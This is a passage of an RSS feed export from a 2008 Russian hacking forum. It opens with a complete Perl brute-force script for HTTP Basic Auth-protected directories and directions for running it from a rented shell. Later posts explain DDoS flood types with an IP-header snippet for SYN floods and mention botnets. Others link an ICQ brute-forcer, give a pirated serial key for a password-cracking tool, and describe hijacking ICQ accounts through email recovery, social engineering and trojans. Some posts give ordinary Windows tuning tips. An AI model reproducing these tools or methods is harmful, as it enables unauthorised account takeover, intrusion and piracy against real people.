						&lt;p&gt;## Autors: Mike: mike@eggru.com, Forb: dmitry@dokuchaev.com&lt;br /&gt;## Modified by sikeirosa: sikeirosa@mail.ru&lt;/p&gt;
						&lt;p&gt;use MIME::Base64;&lt;br /&gt;use IO::Socket;&lt;br /&gt;use POSIX; ### Подрубаем модули POSIX, Socket и Base64&lt;/p&gt;
						&lt;p&gt;$server=&amp;quot;127.0.0.1&amp;quot;; ### Удаленный сервер&lt;br /&gt;$port=&amp;quot;80&amp;quot;; ### Удаленный порт&lt;br /&gt;$dir=&amp;quot;/admin&amp;quot;; ### Запароленная директория&lt;br /&gt;$logfile=&amp;quot;sucess.log&amp;quot;; ### Логфайл, куда пишем пароль&lt;br /&gt;$log=&amp;quot;now.log&amp;quot;; ### Логфайл, куда пишем статус (что происходит в данную минуту)&lt;br /&gt;$words=&amp;quot;bigdict.txt&amp;quot;; ### Словарь (файл с паролями)&lt;br /&gt;$users=&amp;quot;users.txt&amp;quot;; ### Имя пользователя&lt;/p&gt;
						&lt;p&gt;open(file, &amp;quot;&amp;lt;$words&amp;quot;) or die print &amp;quot;$!\n&amp;quot;;&lt;br /&gt;@pwd_data=;&lt;br /&gt;$total=@pwd_data;&lt;br /&gt;close file; ### Записываем все пароли в один массив&lt;/p&gt;
						&lt;p&gt;open(file, &amp;quot;&amp;lt;$users&amp;quot;) or die print &amp;quot;$!\n&amp;quot;;&lt;br /&gt;@users_data=;&lt;br /&gt;$total*=@users_data;&lt;br /&gt;close file; ### Записываем всех пользователей в один массив&lt;/p&gt;
						&lt;p&gt;$i=0;&lt;br /&gt;foreach $user (@users_data) {&lt;br /&gt;foreach $pass (@pwd_data) {&lt;br /&gt;$i++;&lt;br /&gt;chomp($pass);&lt;br /&gt;chomp($user);&lt;br /&gt;open(file, &amp;quot;&amp;gt;$log&amp;quot;) or die print &amp;quot;$!\n&amp;quot;;&lt;br /&gt;$perc=($i*100)/$total;&lt;br /&gt;$perc=ceil($perc); ### Высчитываем процент&lt;br /&gt;print file &amp;quot;$perc\% Done\t$i of $total\t\tNow: $user\:$pass\n&amp;quot;; ### Пишем в лог статус&lt;br /&gt;close file;&lt;/p&gt;
						&lt;p&gt;$auth=encode_base64(&amp;quot;$user\:$pass&amp;quot;); ### Создаем Mime-хеш&lt;br /&gt;chomp($auth);&lt;/p&gt;
						&lt;p&gt;### Порождаем сокет&lt;br /&gt;$socket=IO::Socket::INET-&amp;gt;new( PeerAddr =&amp;gt; $server, PeerPort =&amp;gt; $port, Proto =&amp;gt; &#039;tcp&#039;, Type =&amp;gt; SOCK_STREAM) or die print &amp;quot;Unable to connect to $server:$port\n&amp;quot;;&lt;br /&gt;print $socket &amp;quot;GET $dir Ссылки только для зарегистрированных пользователей.&amp;quot;;&lt;br /&gt;print $socket &amp;quot;Host: $server\n&amp;quot;;&lt;br /&gt;print $socket &amp;quot;Accept: */*\n&amp;quot;;&lt;br /&gt;print $socket &amp;quot;Referer: Ссылки только для зарегистрированных пользователей.&amp;quot;;&lt;br /&gt;print $socket &amp;quot;User-Agent: Internet Explorer 6.0\n&amp;quot;;&lt;br /&gt;print $socket &amp;quot;Pragma: no-cache\n&amp;quot;;&lt;br /&gt;print $socket &amp;quot;Cache-Control: no-cache\n&amp;quot;;&lt;br /&gt;print $socket &amp;quot;Authorization: Basic $auth\n&amp;quot;;&lt;br /&gt;print $socket &amp;quot;Connection: close\n\n&amp;quot;; ### Отправляем Ссылки только для зарегистрированных пользователей.данные + Mime-хеш&lt;/p&gt;
						&lt;p&gt;$ans=&amp;lt;$socket&amp;gt;; ### Получаем ответ от сервера&lt;/p&gt;
						&lt;p&gt;if ($ans=~/200 Ok/i or $ans=~/301/i) {&lt;br /&gt;open(logf, &amp;quot;&amp;gt;&amp;gt;$logfile&amp;quot;) or die print &amp;quot;$!\n&amp;quot;; ### Если пароль верный - пишем в success-лог&lt;br /&gt;print logf &amp;quot;$user:$pass is OK!!!\n&amp;quot;;&lt;br /&gt;close logf;&lt;br /&gt;}&lt;br /&gt;close($socket);&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;Это исходник его брутфорса. Переменные $server, $port, $log, $dir, $logfile, $words, $users необходимо изменить на ваши. Делаем у себя на компе файл brut.pl, вставляем в него код. Также делаем файлы success.log, now.log (оставляем их пустыми). В папку с со всей этой бодягой ложим файл с паролями и переименовываем его на bigdict.txt. И там же создаём файл users.txt и пишем в него имя юзера. Теперь нам нужно закачать всё это на наш шелл. Как это сделать? Можно, конечно, залить файлы на какой-нить сайт, а потом оттуда сливать wget на шелл. Но мы так делать не будем. На rootshell.be есть ftp, через который можно всё это залить к нам в домашнюю директорию. Берём какой-нибудь фтп-клиент, создаём там новое соединение. Имя сервера: ftprootshell.be, а логин с паролем те же, что вы используете для доступа к шеллу. Всё, коннектимся туда, заливаем наши файлы в одну папку, например, brut. Теперь коннектимся к шеллу… Видите, там появились наши файлы%). Заходим в нашу папку: «cd brut». И уже там пишем команду «perl brut.pl» или «perl brut.pl &amp;amp;».&lt;br /&gt;Всё, процесс пошёл, и если тебе повезёт, то через некоторое время в файле success.log появится правильный пароль &lt;/p&gt;
						&lt;p&gt;Вот и всё, что я хотел сегодня рассказать.....&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stre@m)</author>
			<pubDate>Wed, 08 Oct 2008 10:39:08 +0400</pubDate>
			<guid>https://xterritory.0pk.me/viewtopic.php?pid=8#p8</guid>
		</item>
		<item>
			<title>DDOS. И всё о нём. Полезно для новичков!</title>
			<link>https://xterritory.0pk.me/viewtopic.php?pid=7#p7</link>
			<description>&lt;p&gt;Цель &lt;/p&gt;
						&lt;p&gt;Основная цель DoS/DDoS-атак - вывести объект из рабочего состояния. Конечно, в большинстве случаев глобальная атака приводит к большим финансовым потерям со стороны атакуемого. Например, если какой-либо коммерческий сайт упадет на несколько часов, то это нанесет вред бизнесу, а если на неделю, то владелец ресурса вполне может разориться. Или взять локальные сети. Дело в том, что одним из эффектов популярных атак на Denial of Service (DoS) является огромный трафик, направляемый на жертву. Если для крупной западной фирмы это мелочь, то для небольшой отечественной домашней сети средняя атака может грозить разорением. Кроме огромного вреда, наносимого жертве, такие нападения отличаются простотой и огромной эффективностью. Против них нет стопроцентной защиты. Именно названные выше факторы привлекают к DoS внимание специалистов по сетевой безопасности и... DoS&#039;еров. &lt;br /&gt;Принцип работы &lt;/p&gt;
						&lt;p&gt;Для того чтобы обнаружить, а уж тем более организовать DoS/DDoS-атаку, нужно разобраться в ее принципах. Эти атаки не направлены на получение доступа к ресурсам или к важной информации. Атака DoS делает ресурс недоступным для использования путем нарушения его нормальной работы. Атаку на отказ в обслуживании можно провести всего двумя способами: использовав уязвимости в программном обеспечении жертвы и при помощи отсылки большого количества определенно составленных сетевых пакетов (флуд). Первый способ состоит в том, чтобы, используя уязвимости типа переполнения буфера, отослать код, выполняющий DoS на сервере. Поскольку атака будет проводиться &amp;quot;изнутри&amp;quot;, то через очень короткое время объект зависнет или будет отключен от интернета. Этот способ не требует больших вычислительных ресурсов нападающего, однако такая атака предполагает использование уязвимостей, что само по себе усложняет задачу. Поскольку никто не хочет излишне заморачиваться, в народе более популярен второй способ, которому мы и уделим основное внимание. Это пример применения простой грубой силы, которая практически не нуждается в приложении ума. Идея состоит в том, чтобы переслать как можно больше &amp;quot;кривых&amp;quot; запросов серверу (впрочем, не только &amp;quot;кривых&amp;quot;: от огромного количества нормальных пакетов, например GET-запросов для [Только зарегистрированные пользователи могут видеть ссылки.]сервера хосты падают с таким же успехом). Дело в том, что при получении сервером пакета данных происходит его обработка. Если приходит пакет, но сервер занят приемом или обработкой другого пакета, то вновь приходящий запрос ставится в очередь, занимая при этом часть ресурсов системы. При проведении DoS-атаки серверу отсылается большое количество пакетов определенного размера. При этом ответ сервера не ожидается (обычно адрес отправителя фальсифицируется - спуфинг). В результате, из-за того что сервер оказывается перегружен информацией, он либо отключается от интернета, либо зависает. В любом случае, нормальные пользователи некоторое время (иногда довольно продолжительное) не могут пользоваться услугами пострадавшего сервера. Просто и со вкусом :). Однако если сервер атакует одна &amp;quot;точка&amp;quot;, он вполне может закрыться от нее фаерволом. Кроме того, для проведения качественной DoS-атаки необходима довольно высокая пропускная способность канала. Поэтому атака на отказ в обслуживании в большинстве случаев проводится сразу с нескольких машин. Атака, в проведении которой участвует много машин (обычно это затрояненные десктопы, их называют &amp;quot;зомби&amp;quot;), получила название DDoS (Distributed Denial of Service). Для сколь угодно мощного сервера всегда можно подобрать достаточное количество зомбиков (благо дырявых систем и ушастых юзверей по миру много развелось). &lt;br /&gt;Есть несколько способов получения &amp;quot;зомби&amp;quot;. Во-первых, это массовое внедрение трояна на компьютеры мирных пользователей. Самый популярный способ управления троянами - IRC, то есть организация ботнета. При посылке определенных команд троян активируется и мирный домашний компьютер (с широкополосным выходом в интернет) становится источником большого количества мусора, съедающего ресурсы атакуемого сервера. &lt;br /&gt;Чтобы более детально разобраться в DoS-атаках, рассмотрим их наиболее известные разновидности. Выделяют пять наиболее популярных: &lt;/p&gt;
						&lt;p&gt;TCP SYN Flood; &lt;br /&gt;TCP flood; &lt;br /&gt;Ping of Death; &lt;br /&gt;ICMP flood; &lt;br /&gt;UDP flood. TCP SYN Flood и TCP flood &lt;/p&gt;
						&lt;p&gt;Основная цель этого вида атак - превысить ограничение на количество соединений, которые находятся в состоянии установки. В результате, система не может устанавливать новые соединения. После этого каждый дополнительный запрос еще сильнее увеличивает нагрузку. Для того чтобы достичь желаемого результата, при проведении атаки направляется большое количество запросов на инициализацию TСP-соединения с потенциальной жертвой. Такие атаки не нуждаются в обратной связи с атакующим, и поэтому можно не использовать настоящий адрес источника. &lt;br /&gt;Ниже приведен пример установки заголовка IP пакета, который можно использовать в атаке типа &amp;quot;SYN Flood&amp;quot;. &lt;/p&gt;
						&lt;p&gt;Листинг &lt;br /&gt;packet.ip.version=4; // Версия &lt;br /&gt;packet.ip.ihl=5; // Длина заголовка &lt;br /&gt;packet.ip.tos=0; // Тип сервиса &lt;br /&gt;packet.ip.tot_len=htons(40); // Общая длина &lt;br /&gt;packet.ip.id=getpid(); // Идентификатор &lt;br /&gt;packet.ip.frag_off=0; // Смещение фрагмента &lt;br /&gt;packet.ip.ttl=255; // Время жизни &lt;br /&gt;packet.ip.protocol=IPPROTO_TCP; // Протокол &lt;br /&gt;packet.ip.check=0; // Контрольная сумма &lt;br /&gt;packet.ip.saddr=saddress; // Адрес источника &lt;br /&gt;packet.ip.daddr=daddress; // Адрес назначения &lt;/p&gt;
						&lt;p&gt;TCP flood - это вид атаки, при котором потенциальной жертве отправляется множество TCP-пакетов, что приводит к связыванию системных ресурсов. &lt;br /&gt;Следующие виды DoS-атак основаны на совершенно другом принципе. При помощи таких атак можно переполнить сеть или отдельно взятую мишень абсолютно бесполезными ping-пакетами. Для реализации следующих видов атаки достаточно нескольких строк кода. Итак, это атаки, основанные на протоколе ICMP: &lt;br /&gt;Ping of Death и ICMP flood &lt;/p&gt;
						&lt;p&gt;Большое количество DoS-атак основывается на протоколе ICMP. Некоторые его функции могут быть полезны для создания нападений такого рода. &lt;br /&gt;ICMP flood - это далеко не новый вид атаки, который, тем не менее, не теряет популярности. Здесь используется ping. Ping изначально задумывался для проверки качества соединения с удаленным компьютером. Принцип работы следующий: программа отсылает некое сообщение, на которое удаленный компьютер автоматически отвечает. Вроде бы все нормально. Однако при атаке используются большие (64 кБ), сильно фрагментированные ICMP-пакеты. При получении таких пакетов удаленная машина зависает. &lt;br /&gt;Ping of Death основывается на ICMP flood, однако усиливает атаку за счет того, что ping-запросы пересылаются по адресу широковещательной рассылки. Используемый в пакетах запроса адрес - это адрес атакуемого сервера. Получившие такие &amp;quot;посылки смерти&amp;quot; системы отвечают на них и забивают жертву. Это очень серьезный вид атаки, который, правда, требует длительной подготовки. Требуется много &amp;quot;зомби&amp;quot;, необходимо собрать достаточное количество информации о жертве и посредниках. &lt;br /&gt;UDP flood &lt;/p&gt;
						&lt;p&gt;Это наиболее опасный вид атаки. UDP-сервис одной машины генерирует последовательность символов для каждого получаемого системой пакета. Делается это в целях тестирования. Далее связывается с echo-сервисом другой машины, которая повторяет эти символы. В результате, передается большое количество UDP-пакетов с подделанным IP источника. Основная проблема для защиты состоит в том, что протокол UDP не устанавливает соединения и нет никаких индикаторов состояния, чтобы помочь межсетевой защите выявить нападение. Чтобы с большей долей вероятности избежать такой атаки, нужно удалить все ненужные UDP-сервисы, а остальным сервисам использовать механизм прокси-сервера. &lt;br /&gt;Самые мощные DoS/DDoS-атаки &lt;/p&gt;
						&lt;p&gt;Теперь ты знаешь, что собой представляет атака на отказ в обслуживании. Пришло время составить небольшой хит-парад DoS/DDoS-атак. &lt;br /&gt;1) Пожалуй, самой нашумевшей атакой из разряда DoS стала атака на корневые DNS-сервера, произошедшая в ноябре 2002 года. Тогда распределенной атаке подверглись все 13 DNS-серверов, семь из которых вышли из строя. Только высокий уровень избыточности в структуре интернета позволил избежать задержек при обращении к ресурсам. &lt;br /&gt;2) Атака на сайт SCO, совершенная при помощи вируса MyDoom и всех его подцепивших. 22 августа 2003 года сайт компании SCO перестал отвечать на запросы пользователей. Атака продолжалась несколько дней и прекратилась только 25 августа. Поскольку вирус MyDoom имел очень широкое распространение, то атака получилась мощнейшей. Вторая редакция вируса MyDoom.B, созданная для атаки на сайт Microsoft, не имела такого &amp;quot;успеха&amp;quot; у пользователей. &lt;br /&gt;3) Серверы Osirusoft крупнейшего хранилища IP-адресов, замеченных в спаме, были отключены после большого количества распределенных атак на отказ в обслуживании. Данная служба занималась ведением динамического списка IP-адресов, замеченных в спаме. &lt;br /&gt;Атаки на отказ в обслуживании, несомненно, большое зло на просторах интернета. И если отдельно взятую пользовательскую машину можно защитить с помощью фаервола, то для серверов стопроцентной защиты нет и в скором времени не предвидится. Так что с DoS/DDoS-атаками сложилась довольно грустная (или веселая? :)) ситуация. Многие хостеры при обнаружении атаки просто выключают сервера. Это о чем-то говорит ;).&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stre@m)</author>
			<pubDate>Wed, 08 Oct 2008 10:37:16 +0400</pubDate>
			<guid>https://xterritory.0pk.me/viewtopic.php?pid=7#p7</guid>
		</item>
		<item>
			<title>настройка Windows</title>
			<link>https://xterritory.0pk.me/viewtopic.php?pid=6#p6</link>
			<description>&lt;p&gt;настройка виндовс.&lt;br /&gt;тут можно говорить чесами...&lt;br /&gt;я розкажу самое главное...&lt;br /&gt;вопервых ненадо создавать на рабочем столе горы ярлыков...&lt;br /&gt;вовторых давайте зайдем в &amp;quot;мой компьютер&amp;quot; и на белом поле щелкаем свойства&lt;br /&gt;1. вкладка &amp;quot;автоматическое обновление&amp;quot; - отключить!&lt;br /&gt;2. вкладка &amp;quot;дополнительно&amp;quot; - в ней пункт &amp;quot;быстродействие&amp;quot; если вы не геймер советую отключить &amp;quot;файл подкачки&amp;quot; если будете ставить &amp;quot;сталкер&amp;quot; советую на диске с виндой сделать файл подкачки 2ГБ&lt;br /&gt;и всегда следить что бы на диске с виндой было хоть 3-4ГБ свободного места...&lt;br /&gt;там же в &amp;quot;дополнительно&amp;quot; есть и пункт &amp;quot;отчет об ошибках&amp;quot; там можно отключить те таблички которые бесят&amp;#160; &amp;quot;произошла ошибка отправлять\неотправлять отчет&amp;quot;&lt;br /&gt;после введения настроек жмем применить и ок&lt;/p&gt;
						&lt;p&gt;далее невыходя из моего компьютера вверху жмем сервис\свойства папки\вид\&lt;br /&gt;там находим пункт &amp;quot;скрывать защищенные системные файлы (рекомендуется)&amp;quot; и снимаем птичку!!! (будут видны файлы такие как boot.ini)&lt;br /&gt;под ней есть вкладка &amp;quot;скрывать розширения для зарегистрированных типов файлов&amp;quot; тоже снимаем птичку обязательно!!!&lt;br /&gt;далее пункт &amp;quot;показывать\скрывать скрытые файлы и папки&amp;quot; ставим показывать...&lt;br /&gt;далее:&lt;br /&gt;панель управления\администрирование\управление компьютером\службы и приложения\службы&lt;br /&gt;откроется окно перечисляющее службы&lt;br /&gt;все описаны в подробностях и я думаю каждый поймет... что если у него нет принтера то и служба прин теров ему ненужна... А ЭТО ЖРЕТ ОПЕРАТИВУ!!!&lt;br /&gt;и так далее... все службы которые вам ненадо... &lt;br /&gt;далее вся настройка производится по усмотрению владельца...&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stre@m)</author>
			<pubDate>Wed, 08 Oct 2008 10:24:00 +0400</pubDate>
			<guid>https://xterritory.0pk.me/viewtopic.php?pid=6#p6</guid>
		</item>
		<item>
			<title>взлом архивов ZIP,RAR</title>
			<link>https://xterritory.0pk.me/viewtopic.php?pid=5#p5</link>
			<description>&lt;p&gt;Вашему вниманию предлагается широко известная программа брутилка для восстановления паролей к архивам RAR, ZIP и прочим... (ZIP (PKZIP, WinZIP), ARJ/WinARJ, RAR/WinRAR и ACE/WinACE...)&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;Advanced Archive Password Recovery&lt;/strong&gt;&lt;/p&gt;
						&lt;p&gt;Качать тут - &lt;a href=&quot;http://www.password-crackers.ru/category_98/program_100.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.password-crackers.ru/categor &amp;#8230; m_100.html&lt;/a&gt;&lt;br /&gt;рег. номер:&lt;br /&gt;&amp;quot;&lt;strong&gt;ARCHPR-TBHW5SSMYGQS-3KQ2E6E9CU4S4BMN&lt;/strong&gt;&amp;quot; - без кавычек!!!&lt;/p&gt;
						&lt;p&gt;Есть в этой програмке следующие благодейства)):&lt;br /&gt;1. Банальный перебор паролей&lt;br /&gt;2. Перебор паролей по маске&lt;br /&gt;3. Перебор паролей по словарю&lt;br /&gt;4. Plaintext-атака&lt;br /&gt;5. Гарантированная расшифровка WinZIP&lt;br /&gt;6. Пароль из ключей&lt;/p&gt;
						&lt;p&gt;по каждому из методов можно найти инфу в Гугле...&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stre@m)</author>
			<pubDate>Tue, 07 Oct 2008 21:11:23 +0400</pubDate>
			<guid>https://xterritory.0pk.me/viewtopic.php?pid=5#p5</guid>
		</item>
		<item>
			<title>Brutal</title>
			<link>https://xterritory.0pk.me/viewtopic.php?pid=4#p4</link>
			<description>&lt;p&gt;ICQ-брутфорсер, работает с прокси, поддерживает https, socks4, socks5 прокси. Многопоточный, количество потоков можно изменять в процессе работы. Возможно устанавливать максимальное время отзыва на подключение, чтение и запись (опция Timeout), опция указывается в секундах и может быть изменена во время работы программы. Также реализована очистка прокси-листов от &amp;quot;мертвых&amp;quot; прокси (опция Cleanup, 0 соответствует отключению опции), значение берется при старте, указывается в минутах. Также очистку можно производить вручную с помощью соответствующих кнопок: Cleanup All, Cleanup HTTPs, Cleanup Socks4, Cleanup Socks5. Поддержка множества списков для брута.&lt;/p&gt;
						&lt;p&gt;Файлы для работы брута (если файлов не было, программа сама их создаст при старте):&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; * source.txt - список (уин;пароль) для брута&lt;br /&gt;&amp;#160; &amp;#160; * good.txt – список (уин;пароль), сюда идут верные комбинации уин;пароль&lt;br /&gt;&amp;#160; &amp;#160; * https.txt - список ip:port (host:port недопустимо) https прокси&lt;br /&gt;&amp;#160; &amp;#160; * socks4.txt - список ip:port (host:port недопустимо) socks4 прокси&lt;br /&gt;&amp;#160; &amp;#160; * socks5.txt - список ip:port (host:port недопустимо) socks5 прокси&lt;br /&gt;&amp;#160; &amp;#160; * list.txt - список с именами файлов для брута&lt;br /&gt;&amp;quot;Speed&amp;quot; показывает скорость (pps - паролей в секунду) в формате &amp;quot;сейчас / средняя&amp;quot;.&lt;br /&gt;скачать &lt;a href=&quot;http://grabberz.com/downloads/Brutal.rar&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://grabberz.com/downloads/Brutal.rar&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stre@m)</author>
			<pubDate>Tue, 07 Oct 2008 21:09:45 +0400</pubDate>
			<guid>https://xterritory.0pk.me/viewtopic.php?pid=4#p4</guid>
		</item>
		<item>
			<title>Чистим Реестр</title>
			<link>https://xterritory.0pk.me/viewtopic.php?pid=3#p3</link>
			<description>&lt;p&gt;Если вы часто устанавливаете программы, а затем их удаляете, то постепенно размер &lt;br /&gt;реестра в разделах &lt;strong&gt;HKEY_CURRENT_USER -&amp;gt; Software и HKEY_LOCAL_MACHIN -&amp;gt; SOFTWARE &lt;/strong&gt;&lt;br /&gt;увеличивается, так как каждая установленная программа оставляет запись о своём &lt;br /&gt;пребывании в системе в выше упомянутых разделах реестра. При чистке реестра &lt;br /&gt;необходимо учитывать какие из программ у вас установленны, а какие вы уже удалили. &lt;br /&gt;Если вы видите запись оставленную программой, которую удалили месяц назад или &lt;br /&gt;только вчера смело удаляйте её каталог, а если вы видите запись программы, которая &lt;br /&gt;установленна на вашем компе, то советую ничего не трогать. Так же перед тем как &lt;br /&gt;бороздить просторы реестра и что либо там удалять сделайте резервную копию реестра. &lt;br /&gt;Делается это очень просто Пуск -&amp;gt; Выполнить -&amp;gt; regedit заходите в меню Файл -&amp;gt; Экспорт и &lt;br /&gt;присваиваете имя reg файлу. &lt;br /&gt;Постепенное увеличение размера реестра ведёт к торможению и глюкам в системе. &lt;br /&gt;Поэтому его иногда необходимо &amp;quot;зачищать&amp;quot;. &lt;br /&gt;И так приступим к глобальной уборке!&lt;/p&gt;
						&lt;p&gt;&amp;quot;Зачистку реестра&amp;quot; можно выполнять двумя способами: &lt;/p&gt;
						&lt;p&gt;1. руками, т.е зайдя в меню Пуск -&amp;gt; Выполнить -&amp;gt; regedit и производить различные &lt;br /&gt;извращения с реестром. &lt;/p&gt;
						&lt;p&gt;2. с помощью специальных программ например RegCleaner. Зайдя в программу выберите &lt;br /&gt;раздел Программы и начинайте &amp;quot;зачистку&amp;quot;. &lt;/p&gt;
						&lt;p&gt;С помощью этой программы также можно производить отчистку реестра не влезая в него, &lt;br /&gt;для этого зоходите в меню Задачи -&amp;gt; Отчистка реестра -&amp;gt; Задействовать все варианты. &lt;br /&gt;Хочу так же сказать, что второй способ наиболее простой и безопасный для вашей системы. &lt;/p&gt;
						&lt;p&gt;Советую удалить из реестра за ненадобностью: &lt;br /&gt;- Удаляем Доктор Ватсон(Dr.Watson) - обработчик программных ошибок. Он обрабатывает &lt;br /&gt;ошибки по мере их возникновения во время выполнения программы. Нам он не нужен тем &lt;br /&gt;более, что его каталог занимает драгоценное место в реестре поэтому, заходим в ветку &lt;br /&gt;реестра HKEY_LOCAL_MACHIN -&amp;gt;SOFTWARE -&amp;gt;Microsoft -&amp;gt; и удаляем там папку DrWatson. &lt;/p&gt;
						&lt;p&gt;- Удаляем папку Update, если вы не пользуетесь автоматическим обнавлением, в ветки &lt;br /&gt;реестра HKEY_LOCAL_MACHIN -&amp;gt; CurrentControlSet -&amp;gt;Control-&amp;gt;. &lt;/p&gt;
						&lt;p&gt;Все изменения в реестре вступают в силу только после перезагрузки компа. &lt;br /&gt;В заключении хочется сказать можете удалять то что считаете не нужным для вас, &lt;br /&gt;но будте внимательны и осторожны так как это может привести к краху системы или её &lt;br /&gt;неработоспособности&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stre@m)</author>
			<pubDate>Tue, 07 Oct 2008 18:36:37 +0400</pubDate>
			<guid>https://xterritory.0pk.me/viewtopic.php?pid=3#p3</guid>
		</item>
		<item>
			<title>Взлом ICQ</title>
			<link>https://xterritory.0pk.me/viewtopic.php?pid=2#p2</link>
			<description>&lt;p&gt;ася тоже вешь ломаемая)&lt;br /&gt;шестизнак мона купить а мона и ломануть)&lt;br /&gt;давайте розсмотрим второй вариант!&lt;br /&gt;есть несколько способов взлома айсику:&lt;br /&gt;1. - брут (подбор пароля методом перебора всех возможных значений)&lt;br /&gt;2. - угон через мыло&lt;br /&gt;3. - угон через СИ&lt;br /&gt;4. - угон через розшифровку утащеного файлика аси&lt;br /&gt;5. - взломав сервак айсику&lt;br /&gt;давайте попорядку:&lt;br /&gt;брут: есть куча прог для подбора паролей к почтам, асям и всякой фигне потипу этой...&lt;br /&gt;все они работают по одинаковому принципу ты указываешь список прокси (для некоторых прог если работает через прокси)&lt;br /&gt;указываешь список паролей и один номер или наоборот список номеров и пароль ставишь на пуск и перебирай... она поочереди перебирает пароли или юины.&lt;br /&gt;мож когда-то и повезет...&lt;br /&gt;а так вообще способ длительный напрегающий и подходит невсегда...&lt;br /&gt;нормальная прграммулина есть ICQ password recovery v 1.8 поддерживает много способов перебора, ненадо формировать листы &amp;quot;пас;юин&amp;quot; короче удобная...&lt;br /&gt;если использовать другие проги то надо паралельно качать и какойто криэйтер для брута...&lt;br /&gt;второй вариант - это угон через мыло...&lt;br /&gt;сущевствует такая штуковина как &amp;quot;примари&amp;quot; это когда к конкретному номеру аси привязанно конкретное мыло... и способ взлома заключается в взломе не аси а мыла! вы ломаете мыло (ответ на контрольный вопрос, брут) лучше способом &amp;quot;ответа на контрольный вопрос&amp;quot; тобешь вы востанавливаете пароль мыла! если мы знаем мыло заходим туда) мона меседжи пачитать)&lt;br /&gt;но это фигня! нам надо ася! идем в ту асю! нам говорит мол &amp;quot;пароль неверный!&amp;quot;!!! жмем &amp;quot;востановить забытый пароль!&amp;quot; востанавливаем и пароль приходит на мыло владельца! КОТОРОЕ МЫ УЖЕ ЛОМАНУЛИ! идем на мыло и там письмо с паролем от аси!&lt;br /&gt;третий способ - это её величество СИ!&amp;#160; ружно смотрим тему СИ там описано в подробностях!&lt;br /&gt;четвертый способ - это впринципе мало когда прокатывает... так-как пароль сохраняется в файл если человек нажимает &amp;quot;сохранить пароль&amp;quot; типа вход &amp;quot;на автомате&amp;quot; но пробовать мона...&lt;br /&gt;мона писать скрипт который идет по мылу и потом отсылает хвайл к вам или просто ломануть комп с помощью трояна и влезть в папку с аськой стащить оттуда файл и уже &amp;quot;дома&amp;quot; его розархивировать...&lt;br /&gt;есть так-же куча прог для розашифровки паролей именно из этих файлов...&lt;br /&gt;потому-как у всех клиентов разные файлы мы просто качаем всю папку а потом уже смотрим...&lt;br /&gt;на счет пятого - это реально но с моей стороны шутка)&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stre@m)</author>
			<pubDate>Tue, 07 Oct 2008 18:28:26 +0400</pubDate>
			<guid>https://xterritory.0pk.me/viewtopic.php?pid=2#p2</guid>
		</item>
	</channel>
</rss>
